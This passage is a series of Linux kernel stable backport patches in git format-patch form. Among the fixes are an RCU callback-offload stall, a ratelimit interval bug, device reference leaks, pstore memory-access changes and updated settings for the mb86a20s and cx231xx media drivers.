[ 368.106005] [ 368.106005] [ 368.106005] [] ip_route_input_noref+0x516/0xbd0 [ 368.106005] [] ? skb_release_data+0xd6/0x110 [ 368.106005] [] ? kfree_skb+0x3a/0xa0 [ 368.106005] [] ip_rcv_finish+0x29f/0x350 [ 368.106005] [] ip_rcv+0x234/0x380 [ 368.106005] [] __netif_receive_skb_core+0x676/0x870 [ 368.106005] [] __netif_receive_skb+0x18/0x60 [ 368.106005] [] process_backlog+0xae/0x180 [ 368.106005] [] net_rx_action+0x152/0x240 [ 368.106005] [] __do_softirq+0xef/0x280 [ 368.106005] [] call_softirq+0x1c/0x30 [ 368.106005] [ 368.106005] [ 368.106005] [] do_softirq+0x65/0xa0 [ 368.106005] [] local_bh_enable+0x94/0xa0 [ 368.106005] [] rcu_nocb_kthread+0x232/0x370 [ 368.106005] [] ? wake_up_bit+0x30/0x30 [ 368.106005] [] ? rcu_start_gp+0x40/0x40 [ 368.106005] [] kthread+0xcf/0xe0 [ 368.106005] [] ? kthread_create_on_node+0x140/0x140 [ 368.106005] [] ret_from_fork+0x58/0x90 [ 368.106005] [] ? kthread_create_on_node+0x140/0x140 ==================================cut here============================== It turns out that the rcuos callback-offload kthread is busy processing a very large quantity of RCU callbacks, and it is not reliquishing the CPU while doing so. This commit therefore adds an cond_resched_rcu_qs() within the loop to allow other tasks to run. [js] use onlu cond_resched() in 3.12 Signed-off-by: Ding Tianhong [ paulmck: Substituted cond_resched_rcu_qs for cond_resched. ] Signed-off-by: Paul E. McKenney Cc: Dhaval Giani Signed-off-by: Jiri Slaby Signed-off-by: Willy Tarreau --- kernel/rcutree_plugin.h | 1 + 1 file changed, 1 insertion(+) diff --git a/kernel/rcutree_plugin.h b/kernel/rcutree_plugin.h index 3db5a375d8d..468786bee4e 100644 --- a/kernel/rcutree_plugin.h +++ b/kernel/rcutree_plugin.h @@ -2243,6 +2243,7 @@ static int rcu_nocb_kthread(void *arg) cl++; c++; local_bh_enable(); + cond_resched(); list = next; } trace_rcu_batch_end(rdp->rsp->name, c, !!list, 0, 0, 1); From 479ce88b0d2a0abe07d9c8da8cf80a5eef626831 Mon Sep 17 00:00:00 2001 From: Jaewon Kim Date: Thu, 21 Jan 2016 16:55:07 -0800 Subject: [PATCH 283/315] ratelimit: fix bug in time interval by resetting right begin time commit c2594bc37f4464bc74f2c119eb3269a643400aa0 upstream. rs->begin in ratelimit is set in two cases. 1) when rs->begin was not initialized 2) when rs->interval was passed For case #2, current ratelimit sets the begin to 0. This incurrs improper suppression. The begin value will be set in the next ratelimit call by 1). Then the time interval check will be always false, and rs->printed will not be initialized. Although enough time passed, ratelimit may return 0 if rs->printed is not less than rs->burst. To reset interval properly, begin should be jiffies rather than 0. For an example code below: static DEFINE_RATELIMIT_STATE(mylimit, 1, 1); for (i = 1; i <= 10; i++) { if (__ratelimit(&mylimit)) printk("ratelimit test count %d\n", i); msleep(3000); } test result in the current code shows suppression even there is 3 seconds sleep. [ 78.391148] ratelimit test count 1 [ 81.295988] ratelimit test count 2 [ 87.315981] ratelimit test count 4 [ 93.336267] ratelimit test count 6 [ 99.356031] ratelimit test count 8 [ 105.376367] ratelimit test count 10 Signed-off-by: Jaewon Kim Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- lib/ratelimit.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/ratelimit.c b/lib/ratelimit.c index 40e03ea2a96..2c5de86460c 100644 --- a/lib/ratelimit.c +++ b/lib/ratelimit.c @@ -49,7 +49,7 @@ int ___ratelimit(struct ratelimit_state *rs, const char *func) if (rs->missed) printk(KERN_WARNING "%s: %d callbacks suppressed\n", func, rs->missed); - rs->begin = 0; + rs->begin = jiffies; rs->printed = 0; rs->missed = 0; } From 26b5a4a56fd60530d0ab3b51a7fda5841d4f9316 Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Tue, 1 Nov 2016 11:38:18 +0100 Subject: [PATCH 284/315] mfd: core: Fix device reference leak in mfd_clone_cell commit 722f191080de641f023feaa7d5648caf377844f5 upstream. Make sure to drop the reference taken by bus_find_device_by_name() before returning from mfd_clone_cell(). Fixes: a9bbba996302 ("mfd: add platform_device sharing support for mfd") Signed-off-by: Johan Hovold Signed-off-by: Lee Jones Signed-off-by: Willy Tarreau --- drivers/mfd/mfd-core.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/mfd/mfd-core.c b/drivers/mfd/mfd-core.c index 7604f4e5df4..af6a245dc50 100644 --- a/drivers/mfd/mfd-core.c +++ b/drivers/mfd/mfd-core.c @@ -263,6 +263,8 @@ int mfd_clone_cell(const char *cell, const char **clones, size_t n_clones) clones[i]); } + put_device(dev); + return 0; } EXPORT_SYMBOL(mfd_clone_cell); From 6d97f02a6c0faa8cef0bae45cc2f16fbaf38332a Mon Sep 17 00:00:00 2001 From: Johan Hovold Date: Tue, 1 Nov 2016 11:49:56 +0100 Subject: [PATCH 285/315] PM / sleep: fix device reference leak in test_suspend commit ceb75787bc75d0a7b88519ab8a68067ac690f55a upstream. Make sure to drop the reference taken by class_find_device() after opening the RTC device. Fixes: 77437fd4e61f (pm: boot time suspend selftest) Signed-off-by: Johan Hovold Signed-off-by: Rafael J. Wysocki Signed-off-by: Willy Tarreau --- kernel/power/suspend_test.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/kernel/power/suspend_test.c b/kernel/power/suspend_test.c index 269b097e78e..743615bfdce 100644 --- a/kernel/power/suspend_test.c +++ b/kernel/power/suspend_test.c @@ -169,8 +169,10 @@ static int __init test_suspend(void) /* RTCs have initialized by now too ... can we use one? */ dev = class_find_device(rtc_class, NULL, NULL, has_wakealarm); - if (dev) + if (dev) { rtc = rtc_class_open(dev_name(dev)); + put_device(dev); + } if (!rtc) { printk(warn_no_rtc); goto done; From 0d9dddc0b582237e0e8afa19f83a3844fa9a846e Mon Sep 17 00:00:00 2001 From: Fabio Estevam Date: Sat, 5 Nov 2016 17:45:07 -0200 Subject: [PATCH 286/315] mmc: mxs: Initialize the spinlock prior to using it commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream. An interrupt may occur right after devm_request_irq() is called and prior to the spinlock initialization, leading to a kernel oops, as the interrupt handler uses the spinlock. In order to prevent this problem, move the spinlock initialization prior to requesting the interrupts. Fixes: e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28) Signed-off-by: Fabio Estevam Reviewed-by: Marek Vasut Signed-off-by: Ulf Hansson Signed-off-by: Willy Tarreau --- drivers/mmc/host/mxs-mmc.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/mmc/host/mxs-mmc.c b/drivers/mmc/host/mxs-mmc.c index 4278a1787d0..f3a42321310 100644 --- a/drivers/mmc/host/mxs-mmc.c +++ b/drivers/mmc/host/mxs-mmc.c @@ -674,13 +674,13 @@ static int mxs_mmc_probe(struct platform_device *pdev) platform_set_drvdata(pdev, mmc); + spin_lock_init(&host->lock); + ret = devm_request_irq(&pdev->dev, irq_err, mxs_mmc_irq_handler, 0, DRIVER_NAME, host); if (ret) goto out_free_dma; - spin_lock_init(&host->lock); - ret = mmc_add_host(mmc); if (ret) goto out_free_dma; From 98af342bf574c0fb71194be847014cf3ac90737b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Daniel=20Gl=C3=B6ckner?= Date: Tue, 30 Aug 2016 14:17:30 +0200 Subject: [PATCH 287/315] mmc: block: don't use CMD23 with very old MMC cards MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 0ed50abb2d8fc81570b53af25621dad560cd49b3 upstream. CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1. Older versions of the specification allowed to terminate multi-block transfers only with CMD12. The patch fixes the following problem: mmc0: new MMC card at address 0001 mmcblk0: mmc0:0001 SDMB-16 15.3 MiB mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900 ... blk_update_request: I/O error, dev mmcblk0, sector 0 Buffer I/O error on dev mmcblk0, logical block 0, async page read mmcblk0: unable to read partition table Signed-off-by: Daniel Glöckner Signed-off-by: Ulf Hansson Signed-off-by: Willy Tarreau --- drivers/mmc/card/block.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/mmc/card/block.c b/drivers/mmc/card/block.c index a2863b7b9e2..ce34c492a88 100644 --- a/drivers/mmc/card/block.c +++ b/drivers/mmc/card/block.c @@ -2093,7 +2093,8 @@ static struct mmc_blk_data *mmc_blk_alloc_req(struct mmc_card *card, set_capacity(md->disk, size); if (mmc_host_cmd23(card->host)) { - if (mmc_card_mmc(card) || + if ((mmc_card_mmc(card) && + card->csd.mmca_vsn >= CSD_SPEC_VER_3) || (mmc_card_sd(card) && card->scr.cmds & SD_SCR_CMD23_SUPPORT)) md->flags |= MMC_BLK_CMD23; From 90efe9d4773eedf96d9e4ebb0193da7c6f09ca52 Mon Sep 17 00:00:00 2001 From: Sebastian Andrzej Siewior Date: Thu, 8 Sep 2016 13:48:06 +0200 Subject: [PATCH 288/315] pstore/core: drop cmpxchg based updates MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit d5a9bf0b38d2ac85c9a693c7fb851f74fd2a2494 upstream. I have here a FPGA behind PCIe which exports SRAM which I use for pstore. Now it seems that the FPGA no longer supports cmpxchg based updates and writes back 0xff…ff and returns the same. This leads to crash during crash rendering pstore useless. Since I doubt that there is much benefit from using cmpxchg() here, I am dropping this atomic access and use the spinlock based version. Cc: Anton Vorontsov Cc: Colin Cross Cc: Kees Cook Cc: Tony Luck Cc: Rabin Vincent Tested-by: Rabin Vincent Signed-off-by: Sebastian Andrzej Siewior Reviewed-by: Guenter Roeck [kees: remove "_locked" suffix since it's the only option now] Signed-off-by: Kees Cook Signed-off-by: Willy Tarreau --- fs/pstore/ram_core.c | 43 ++----------------------------------------- 1 file changed, 2 insertions(+), 41 deletions(-) diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c index 0b367ef7a7d..ee3c6ec5348 100644 --- a/fs/pstore/ram_core.c +++ b/fs/pstore/ram_core.c @@ -45,43 +45,10 @@ static inline size_t buffer_start(struct persistent_ram_zone *prz) return atomic_read(&prz->buffer->start); } -/* increase and wrap the start pointer, returning the old value */ -static size_t buffer_start_add_atomic(struct persistent_ram_zone *prz, size_t a) -{ - int old; - int new; - - do { - old = atomic_read(&prz->buffer->start); - new = old + a; - while (unlikely(new >= prz->buffer_size)) - new -= prz->buffer_size; - } while (atomic_cmpxchg(&prz->buffer->start, old, new) != old); - - return old; -} - -/* increase the size counter until it hits the max size */ -static void buffer_size_add_atomic(struct persistent_ram_zone *prz, size_t a) -{ - size_t old; - size_t new; - - if (atomic_read(&prz->buffer->size) == prz->buffer_size) - return; - - do { - old = atomic_read(&prz->buffer->size); - new = old + a; - if (new > prz->buffer_size) - new = prz->buffer_size; - } while (atomic_cmpxchg(&prz->buffer->size, old, new) != old); -} - static DEFINE_RAW_SPINLOCK(buffer_lock); /* increase and wrap the start pointer, returning the old value */ -static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a) +static size_t buffer_start_add(struct persistent_ram_zone *prz, size_t a) { int old; int new; @@ -101,7 +68,7 @@ static size_t buffer_start_add_locked(struct persistent_ram_zone *prz, size_t a) } /* increase the size counter until it hits the max size */ -static void buffer_size_add_locked(struct persistent_ram_zone *prz, size_t a) +static void buffer_size_add(struct persistent_ram_zone *prz, size_t a) { size_t old; size_t new; @@ -122,9 +89,6 @@ exit: raw_spin_unlock_irqrestore(&buffer_lock, flags); } -static size_t (*buffer_start_add)(struct persistent_ram_zone *, size_t) = buffer_start_add_atomic; -static void (*buffer_size_add)(struct persistent_ram_zone *, size_t) = buffer_size_add_atomic; - static void notrace persistent_ram_encode_rs8(struct persistent_ram_zone *prz, uint8_t *data, size_t len, uint8_t *ecc) { @@ -426,9 +390,6 @@ static void *persistent_ram_iomap(phys_addr_t start, size_t size, return NULL; } - buffer_start_add = buffer_start_add_locked; - buffer_size_add = buffer_size_add_locked; - if (memtype) va = ioremap(start, size); else From 0d29b98a434751a1b7c654d4e437883f3f27fe51 Mon Sep 17 00:00:00 2001 From: Furquan Shaikh Date: Mon, 15 Feb 2016 09:19:48 +0100 Subject: [PATCH 289/315] pstore/ram: Use memcpy_toio instead of memcpy commit 7e75678d23167c2527e655658a8ef36a36c8b4d9 upstream. persistent_ram_update uses vmap / iomap based on whether the buffer is in memory region or reserved region. However, both map it as non-cacheable memory. For armv8 specifically, non-cacheable mapping requests use a memory type that has to be accessed aligned to the request size. memcpy() doesn't guarantee that. Signed-off-by: Furquan Shaikh Signed-off-by: Enric Balletbo Serra Reviewed-by: Aaron Durbin Reviewed-by: Olof Johansson Tested-by: Furquan Shaikh Signed-off-by: Kees Cook Signed-off-by: Willy Tarreau --- fs/pstore/ram_core.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c index ee3c6ec5348..eb42483dbb0 100644 --- a/fs/pstore/ram_core.c +++ b/fs/pstore/ram_core.c @@ -263,7 +263,7 @@ static void notrace persistent_ram_update(struct persistent_ram_zone *prz, const void *s, unsigned int start, unsigned int count) { struct persistent_ram_buffer *buffer = prz->buffer; - memcpy(buffer->data + start, s, count); + memcpy_toio(buffer->data + start, s, count); persistent_ram_update_ecc(prz, start, count); } From 8996ef00ef17c7e8460bca5785c5f08794d9f589 Mon Sep 17 00:00:00 2001 From: Andrew Bresticker Date: Mon, 15 Feb 2016 09:19:49 +0100 Subject: [PATCH 290/315] pstore/ram: Use memcpy_fromio() to save old buffer commit d771fdf94180de2bd811ac90cba75f0f346abf8d upstream. The ramoops buffer may be mapped as either I/O memory or uncached memory. On ARM64, this results in a device-type (strongly-ordered) mapping. Since unnaligned accesses to device-type memory will generate an alignment fault (regardless of whether or not strict alignment checking is enabled), it is not safe to use memcpy(). memcpy_fromio() is guaranteed to only use aligned accesses, so use that instead. Signed-off-by: Andrew Bresticker Signed-off-by: Enric Balletbo Serra Reviewed-by: Puneet Kumar Signed-off-by: Kees Cook Signed-off-by: Willy Tarreau --- fs/pstore/ram_core.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c index eb42483dbb0..7df456db7c3 100644 --- a/fs/pstore/ram_core.c +++ b/fs/pstore/ram_core.c @@ -286,8 +286,8 @@ void persistent_ram_save_old(struct persistent_ram_zone *prz) } prz->old_log_size = size; - memcpy(prz->old_log, &buffer->data[start], size - start); - memcpy(prz->old_log + size - start, &buffer->data[0], start); + memcpy_fromio(prz->old_log, &buffer->data[start], size - start); + memcpy_fromio(prz->old_log + size - start, &buffer->data[0], start); } int notrace persistent_ram_write(struct persistent_ram_zone *prz, From e80cf277b9af15f9fa149501aba402b27b141e4d Mon Sep 17 00:00:00 2001 From: Mauro Carvalho Chehab Date: Sun, 4 Sep 2016 10:16:18 -0300 Subject: [PATCH 291/315] mb86a20s: fix the locking logic commit dafb65fb98d85d8e78405e82c83e81975e5d5480 upstream. On this frontend, it takes a while to start output normal TS data. That only happens on state S9. On S8, the TS output is enabled, but it is not reliable enough. However, the zigzag loop is too fast to let it sync. As, on practical tests, the zigzag software loop doesn't seem to be helping, but just slowing down the tuning, let's switch to hardware algorithm, as the tuners used on such devices are capable of work with frequency drifts without any help from software. Signed-off-by: Mauro Carvalho Chehab Signed-off-by: Willy Tarreau --- drivers/media/dvb-frontends/mb86a20s.c | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c index 2c7217fb141..3fbac5fd4d3 100644 --- a/drivers/media/dvb-frontends/mb86a20s.c +++ b/drivers/media/dvb-frontends/mb86a20s.c @@ -321,7 +321,11 @@ static int mb86a20s_read_status(struct dvb_frontend *fe, fe_status_t *status) if (val >= 7) *status |= FE_HAS_SYNC; - if (val >= 8) /* Maybe 9? */ + /* + * Actually, on state S8, it starts receiving TS, but the TS + * output is only on normal state after the transition to S9. + */ + if (val >= 9) *status |= FE_HAS_LOCK; dev_dbg(&state->i2c->dev, "%s: Status = 0x%02x (state = %d)\n", @@ -2080,6 +2084,11 @@ static void mb86a20s_release(struct dvb_frontend *fe) kfree(state); } +static int mb86a20s_get_frontend_algo(struct dvb_frontend *fe) +{ + return DVBFE_ALGO_HW; +} + static struct dvb_frontend_ops mb86a20s_ops; struct dvb_frontend *mb86a20s_attach(const struct mb86a20s_config *config, @@ -2153,6 +2162,7 @@ static struct dvb_frontend_ops mb86a20s_ops = { .read_status = mb86a20s_read_status_and_stats, .read_signal_strength = mb86a20s_read_signal_strength_from_cache, .tune = mb86a20s_tune, + .get_frontend_algo = mb86a20s_get_frontend_algo, }; MODULE_DESCRIPTION("DVB Frontend module for Fujitsu mb86A20s hardware"); From e3ba79c75a04914e3f398ac6bcda1b0c3b7fb787 Mon Sep 17 00:00:00 2001 From: Mauro Carvalho Chehab Date: Sun, 4 Sep 2016 10:43:53 -0300 Subject: [PATCH 292/315] mb86a20s: fix demod settings commit 505a0ea706fc1db4381baa6c6bd2e596e730a55e upstream. With the current settings, only one channel locks properly. That's likely because, when this driver was written, Brazil were still using experimental transmissions. Change it to reproduce the settings used by the newer drivers. That makes it lock on other channels. Tested with both PixelView SBTVD Hybrid (cx231xx-based) and C3Tech Digital Duo HDTV/SDTV (em28xx-based) devices. Signed-off-by: Mauro Carvalho Chehab Signed-off-by: Willy Tarreau --- drivers/media/dvb-frontends/mb86a20s.c | 92 ++++++++++++-------------- 1 file changed, 42 insertions(+), 50 deletions(-) diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c index 3fbac5fd4d3..4a1346fb383 100644 --- a/drivers/media/dvb-frontends/mb86a20s.c +++ b/drivers/media/dvb-frontends/mb86a20s.c @@ -75,25 +75,27 @@ static struct regdata mb86a20s_init1[] = { }; static struct regdata mb86a20s_init2[] = { - { 0x28, 0x22 }, { 0x29, 0x00 }, { 0x2a, 0x1f }, { 0x2b, 0xf0 }, + { 0x50, 0xd1 }, { 0x51, 0x22 }, + { 0x39, 0x01 }, + { 0x71, 0x00 }, { 0x3b, 0x21 }, - { 0x3c, 0x38 }, + { 0x3c, 0x3a }, { 0x01, 0x0d }, - { 0x04, 0x08 }, { 0x05, 0x03 }, + { 0x04, 0x08 }, { 0x05, 0x05 }, { 0x04, 0x0e }, { 0x05, 0x00 }, - { 0x04, 0x0f }, { 0x05, 0x37 }, - { 0x04, 0x0b }, { 0x05, 0x78 }, + { 0x04, 0x0f }, { 0x05, 0x14 }, + { 0x04, 0x0b }, { 0x05, 0x8c }, { 0x04, 0x00 }, { 0x05, 0x00 }, - { 0x04, 0x01 }, { 0x05, 0x1e }, - { 0x04, 0x02 }, { 0x05, 0x07 }, - { 0x04, 0x03 }, { 0x05, 0xd0 }, + { 0x04, 0x01 }, { 0x05, 0x07 }, + { 0x04, 0x02 }, { 0x05, 0x0f }, + { 0x04, 0x03 }, { 0x05, 0xa0 }, { 0x04, 0x09 }, { 0x05, 0x00 }, { 0x04, 0x0a }, { 0x05, 0xff }, - { 0x04, 0x27 }, { 0x05, 0x00 }, + { 0x04, 0x27 }, { 0x05, 0x64 }, { 0x04, 0x28 }, { 0x05, 0x00 }, - { 0x04, 0x1e }, { 0x05, 0x00 }, - { 0x04, 0x29 }, { 0x05, 0x64 }, - { 0x04, 0x32 }, { 0x05, 0x02 }, + { 0x04, 0x1e }, { 0x05, 0xff }, + { 0x04, 0x29 }, { 0x05, 0x0a }, + { 0x04, 0x32 }, { 0x05, 0x0a }, { 0x04, 0x14 }, { 0x05, 0x02 }, { 0x04, 0x04 }, { 0x05, 0x00 }, { 0x04, 0x05 }, { 0x05, 0x22 }, @@ -101,8 +103,6 @@ static struct regdata mb86a20s_init2[] = { { 0x04, 0x07 }, { 0x05, 0xd8 }, { 0x04, 0x12 }, { 0x05, 0x00 }, { 0x04, 0x13 }, { 0x05, 0xff }, - { 0x04, 0x15 }, { 0x05, 0x4e }, - { 0x04, 0x16 }, { 0x05, 0x20 }, /* * On this demod, when the bit count reaches the count below, @@ -156,42 +156,36 @@ static struct regdata mb86a20s_init2[] = { { 0x50, 0x51 }, { 0x51, 0x04 }, /* MER symbol 4 */ { 0x45, 0x04 }, /* CN symbol 4 */ { 0x48, 0x04 }, /* CN manual mode */ - + { 0x50, 0xd5 }, { 0x51, 0x01 }, { 0x50, 0xd6 }, { 0x51, 0x1f }, { 0x50, 0xd2 }, { 0x51, 0x03 }, - { 0x50, 0xd7 }, { 0x51, 0xbf }, - { 0x28, 0x74 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xff }, - { 0x28, 0x46 }, { 0x29, 0x00 }, { 0x2a, 0x1a }, { 0x2b, 0x0c }, - - { 0x04, 0x40 }, { 0x05, 0x00 }, - { 0x28, 0x00 }, { 0x2b, 0x08 }, - { 0x28, 0x05 }, { 0x2b, 0x00 }, + { 0x50, 0xd7 }, { 0x51, 0x3f }, { 0x1c, 0x01 }, - { 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x1f }, - { 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x18 }, - { 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x12 }, - { 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x30 }, - { 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x37 }, - { 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 }, - { 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x09 }, - { 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x06 }, - { 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7b }, - { 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x76 }, - { 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x7d }, - { 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x08 }, - { 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0b }, - { 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 }, - { 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf2 }, - { 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xf3 }, - { 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x05 }, - { 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 }, - { 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f }, - { 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xef }, - { 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xd8 }, - { 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xf1 }, - { 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x3d }, - { 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x94 }, - { 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0xba }, + { 0x28, 0x06 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x03 }, + { 0x28, 0x07 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0d }, + { 0x28, 0x08 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x02 }, + { 0x28, 0x09 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x01 }, + { 0x28, 0x0a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x21 }, + { 0x28, 0x0b }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x29 }, + { 0x28, 0x0c }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x16 }, + { 0x28, 0x0d }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x31 }, + { 0x28, 0x0e }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0e }, + { 0x28, 0x0f }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x4e }, + { 0x28, 0x10 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x46 }, + { 0x28, 0x11 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x0f }, + { 0x28, 0x12 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x56 }, + { 0x28, 0x13 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x35 }, + { 0x28, 0x14 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbe }, + { 0x28, 0x15 }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0x84 }, + { 0x28, 0x16 }, { 0x29, 0x00 }, { 0x2a, 0x03 }, { 0x2b, 0xee }, + { 0x28, 0x17 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x98 }, + { 0x28, 0x18 }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x9f }, + { 0x28, 0x19 }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0xb2 }, + { 0x28, 0x1a }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0xc2 }, + { 0x28, 0x1b }, { 0x29, 0x00 }, { 0x2a, 0x07 }, { 0x2b, 0x4a }, + { 0x28, 0x1c }, { 0x29, 0x00 }, { 0x2a, 0x01 }, { 0x2b, 0xbc }, + { 0x28, 0x1d }, { 0x29, 0x00 }, { 0x2a, 0x04 }, { 0x2b, 0xba }, + { 0x28, 0x1e }, { 0x29, 0x00 }, { 0x2a, 0x06 }, { 0x2b, 0x14 }, { 0x50, 0x1e }, { 0x51, 0x5d }, { 0x50, 0x22 }, { 0x51, 0x00 }, { 0x50, 0x23 }, { 0x51, 0xc8 }, @@ -200,9 +194,7 @@ static struct regdata mb86a20s_init2[] = { { 0x50, 0x26 }, { 0x51, 0x00 }, { 0x50, 0x27 }, { 0x51, 0xc3 }, { 0x50, 0x39 }, { 0x51, 0x02 }, - { 0xec, 0x0f }, - { 0xeb, 0x1f }, - { 0x28, 0x6a }, { 0x29, 0x00 }, { 0x2a, 0x00 }, { 0x2b, 0x00 }, + { 0x50, 0xd5 }, { 0x51, 0x01 }, { 0xd0, 0x00 }, }; From 9865f08984e14a1cc9f40ecfd468d59c92e1f3ce Mon Sep 17 00:00:00 2001 From: Mauro Carvalho Chehab Date: Sun, 4 Sep 2016 09:56:33 -0300 Subject: [PATCH 293/315] cx231xx: don't return error on success commit 1871d718a9db649b70f0929d2778dc01bc49b286 upstream. The cx231xx_set_agc_analog_digital_mux_select() callers expect it to return 0 or an error. Returning a positive value makes the first attempt to switch between analog/digital to fail. Signed-off-by: Mauro Carvalho Chehab Signed-off-by: Willy Tarreau --- drivers/media/usb/cx231xx/cx231xx-avcore.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/media/usb/cx231xx/cx231xx-avcore.c b/drivers/media/usb/cx231xx/cx231xx-avcore.c index 235ba657d52..79a24efc03d 100644 --- a/drivers/media/usb/cx231xx/cx231xx-avcore.c +++ b/drivers/media/usb/cx231xx/cx231xx-avcore.c @@ -1261,7 +1261,10 @@ int cx231xx_set_agc_analog_digital_mux_select(struct cx231xx *dev, dev->board.agc_analog_digital_select_gpio, analog_or_digital); - return status; + if (status < 0) + return status; + + return 0; } int cx231xx_enable_i2c_port_3(struct cx231xx *dev, bool is_port_3) From dd22893297d519bb849a98bfe39a248a71c34c25 Mon Sep 17 00:00:00 2001 From: Mauro Carvalho Chehab Date: Sun, 4 Sep 2016 10:06:39 -0300 Subject: [PATCH 294/315] cx231xx: fix GPIOs for Pixelview SBTVD hybrid commit 24b923f073ac37eb744f56a2c7f77107b8219ab2 upstream. This device uses GPIOs: 28 to switch between analog and digital modes: on digital mode, it should be set to 1. The code that sets it on analog mode is OK, but it misses the logic that sets it on digital mode. Signed-off-by: Mauro Carvalho Chehab Signed-off-by: Willy Tarreau --- drivers/media/usb/cx231xx/cx231xx-cards.c | 2 +- drivers/media/usb/cx231xx/cx231xx-core.c | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/media/usb/cx231xx/cx231xx-cards.c b/drivers/media/usb/cx231xx/cx231xx-cards.c index 13249e5a789..c13c32347ad 100644 --- a/drivers/media/usb/cx231xx/cx231xx-cards.c +++ b/drivers/media/usb/cx231xx/cx231xx-cards.c @@ -452,7 +452,7 @@ struct cx231xx_board cx231xx_boards[] = { .output_mode = OUT_MODE_VIP11, .demod_xfer_mode = 0, .ctl_pin_status_mask = 0xFFFFFFC4, - 